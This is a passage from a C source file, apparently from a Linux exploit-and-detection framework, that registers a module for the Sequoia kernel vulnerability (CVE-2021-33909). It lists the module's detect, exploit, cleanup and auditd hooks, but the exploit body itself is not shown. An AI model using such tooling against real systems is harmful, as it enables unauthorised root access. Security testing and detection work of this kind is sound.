 * The .kernel_range string is descriptive text; the range actually
 * enforced by detect() is the sequoia_range table.
 */
const struct skeletonkey_module sequoia_module = {
.name = "sequoia",
.cve = "CVE-2021-33909",
.summary = "seq_file size_t overflow → kernel stack OOB write (Qualys Sequoia) — primitive only",
.family = "filesystem",
.kernel_range = "K < 5.13.4 / 5.10.52 / 5.4.134",
.detect = sequoia_detect,
.exploit = sequoia_exploit,
.mitigate = NULL, /* no mitigation hook shipped */
.cleanup = sequoia_cleanup,
.detect_auditd = sequoia_auditd,
.detect_sigma = NULL,
.detect_yara = NULL,
.detect_falco = NULL,
};
/* Public registration hook: passes sequoia_module to skeletonkey_register().
 * NOTE(review): presumably called once from the core's module start-up
 * list — the caller is not visible in this file. */
void skeletonkey_register_sequoia(void)
{
skeletonkey_register(&sequoia_module);
}